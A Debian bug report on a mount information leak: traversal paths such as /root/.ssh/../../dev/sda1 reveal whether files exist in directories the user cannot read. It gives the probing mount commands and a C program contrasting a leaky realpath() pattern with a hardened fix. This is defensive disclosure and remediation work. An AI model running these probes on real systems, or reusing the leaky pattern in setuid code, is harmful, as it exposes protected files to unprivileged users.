Package: mount
Version: 2.20.1-5.3
Severity: critical
Tags: security
Justification: root security hole

mount discloses information about folders not accessible for a user:

  $ ls -ld /root/.ssh
  ls: cannot access /root/.ssh: Permission denied
  $ ls -ld /root/.foo
  ls: cannot access /root/.foo: Permission denied

First variant:

  $ mount --guess-fstype /root/.ssh/../../dev/sda1
  ext4
  $ mount --guess-fstype /root/.foo/../../dev/sda1
  unknown

Second one:

  $ mount /root/.ssh/../../dev/cdrom
  mount: no medium found on /dev/sr0
  $ mount /root/.foo/../../dev/cdrom
  mount: can't find /root/.foo/../../dev/cdrom in /etc/fstab or /etc/mtab

These issues were, as far as I can see, fixed in the following upstream commits:

- 0377ef91270d06592a0d4dd009c29e7b1ff9c9b8
- 33c5fd0c5a774458470c86f9d318d8c48a9c9ccb
- 5ebbc3865d1e53ef42e5f121c41faab23dd59075
- cc8cc8f32c863f3ae6a8a88e97b47bcd6a21825f

However, the last two commits might have to be rewritten - I think that Debian uses mount-deprecated and those commits are for the new mount.

-- System Information:
Debian Release: 7.0
  APT prefers testing
  APT policy: (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.6.7 (SMP w/2 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages mount depends on:
ii  libblkid1    2.20.1-5.3
ii  libc6        2.13-37
ii  libmount1    2.20.1-5.3
ii  libselinux1  2.1.9-5
ii  libsepol1    2.1.4-3

mount recommends no packages.

Versions of packages mount suggests:
ii  nfs-common   1:1.2.6-3

-- no debconf information
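The report above shows an existence oracle: mount is setuid root, so when it canonicalizes the user's argument (turning /root/.ssh/../../dev/sda1 into /dev/sda1) it does so with root's privileges, and whether that canonicalization succeeded shows through in the output. The following C program is an added example written for this page; it is not util-linux code and not the fix in the commits listed above. It contrasts the leaky pattern (realpath() with the program's own privileges) with a hardened variant that first walks every lexical prefix of the caller's path and refuses at the first directory the real user may not search, so /root/.ssh/../.. and /root/.foo/../.. both fail at /root with the same error. The fixture directory names (locked, secret, nope, target) and the deny_locked policy are constructed for the demonstration; in a real setuid program the policy is access(2) with X_OK, which checks the real, not the effective, uid.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Policy hook: may the *real* user search (traverse) directory `dir`?
 * access(2) checks the real uid/gid, the right question inside a setuid-root
 * program such as mount. */
typedef int (*may_search_fn)(const char *dir);

static int real_user_may_search(const char *dir)
{
    return access(dir, X_OK) == 0;
}

/* Leaky pattern from the report: canonicalize the user's path with the
 * program's (effective, i.e. root) privileges and let the outcome show.
 * Returns 1 if `path` resolved, 0 if not. */
int leaky_canonicalize(const char *path, char *out, size_t outlen)
{
    char resolved[PATH_MAX];
    if (!realpath(path, resolved))
        return 0;
    snprintf(out, outlen, "%s", resolved);
    return 1;
}

/* Hardened variant: check every lexical prefix with the real user's rights
 * before anything below it is looked up.  The first unsearchable directory
 * (e.g. /root) aborts with -EACCES whether or not the rest exists.
 * Returns 0 on success, -errno on failure. */
int safe_canonicalize(const char *path, char *out, size_t outlen,
                      may_search_fn may_search)
{
    char prefix[PATH_MAX], resolved[PATH_MAX];
    size_t len = strlen(path);

    if (len == 0)
        return -ENOENT;
    if (len >= sizeof prefix)
        return -ENAMETOOLONG;
    for (size_t i = 1; i < len; i++) {      /* every '/'-terminated prefix */
        if (path[i] != '/')
            continue;
        memcpy(prefix, path, i);
        prefix[i] = '\0';
        if (!may_search(prefix))
            return -EACCES;
    }
    if (!realpath(path, resolved))
        return -errno;
    snprintf(out, outlen, "%s", resolved);
    return 0;
}

/* Constructed fixture (stand-in for /root/.ssh and /dev/sda1):
 * <tmp>/locked/secret (a directory) and <tmp>/target (a file). */
static int make_fixture(char *dir, size_t dirlen)
{
    const char *tmp = getenv("TMPDIR");
    char p[PATH_MAX];
    snprintf(dir, dirlen, "%s/mountleak.XXXXXX", tmp ? tmp : "/tmp");
    if (!mkdtemp(dir))
        return -errno;
    snprintf(p, sizeof p, "%s/locked", dir);
    if (mkdir(p, 0700) < 0)
        return -errno;
    snprintf(p, sizeof p, "%s/locked/secret", dir);
    if (mkdir(p, 0700) < 0)
        return -errno;
    snprintf(p, sizeof p, "%s/target", dir);
    FILE *f = fopen(p, "w");
    if (!f)
        return -errno;
    fclose(f);
    return 0;
}

static void drop_fixture(const char *dir)
{
    const char *entries[] = { "locked/secret", "locked", "target" };
    char p[PATH_MAX];
    for (int i = 0; i < 3; i++) {
        snprintf(p, sizeof p, "%s/%s", dir, entries[i]);
        remove(p);
    }
    rmdir(dir);
}

/* Demo-only policy: the real user may search everything except "locked",
 * which makes the fixture behave like /root does for an ordinary user even
 * when this program runs as the fixture's owner or as root. */
static int deny_locked(const char *dir)
{
    const char *base = strrchr(dir, '/');
    base = base ? base + 1 : dir;
    return strcmp(base, "locked") != 0;
}

/* Probe "<dir>/locked/<name>/../../target" with one of the canonicalizers. */
static int probe(const char *dir, const char *name, int hardened)
{
    char p[PATH_MAX], out[PATH_MAX];
    snprintf(p, sizeof p, "%s/locked/%s/../../target", dir, name);
    return hardened ? safe_canonicalize(p, out, sizeof out, deny_locked)
                    : leaky_canonicalize(p, out, sizeof out);
}

/* 1 if the leaky canonicalizer answers differently for an existing and a
 * missing name behind "locked" (the oracle from the report). */
int leaky_is_oracle(void)
{
    char dir[PATH_MAX];
    if (make_fixture(dir, sizeof dir) < 0)
        return -1;
    int r = probe(dir, "secret", 0) != probe(dir, "nope", 0);
    drop_fixture(dir);
    return r;
}

/* 1 if the hardened canonicalizer returns the same -EACCES for both names. */
int safe_is_uniform(void)
{
    char dir[PATH_MAX];
    if (make_fixture(dir, sizeof dir) < 0)
        return -1;
    int r = probe(dir, "secret", 1) == -EACCES && probe(dir, "nope", 1) == -EACCES;
    drop_fixture(dir);
    return r;
}

int main(void)
{
    const char *paths[] = { "/root/.ssh/../../dev/sda1", "/root/.foo/../../dev/sda1" };
    char out[PATH_MAX];
    for (int i = 0; i < 2; i++)
        printf("%s: leaky=%d safe=%d\n", paths[i],
               leaky_canonicalize(paths[i], out, sizeof out),
               safe_canonicalize(paths[i], out, sizeof out, real_user_may_search));
    printf("oracle=%d uniform=%d\n", leaky_is_oracle(), safe_is_uniform());
    return 0;
}
```

Run as an unprivileged user the program itself is not setuid, so both paths from the report fail in both functions; the fixture-based checks are what show the difference. The prefix walk is lexical and does not follow symlinks, so a symlink inside an already-checked prefix is still resolved by realpath() with the effective uid; the more complete remedy in a setuid program is to drop to the real uid (seteuid(getuid())) around the canonicalization, or not to canonicalize user-supplied paths at all when the caller is not root.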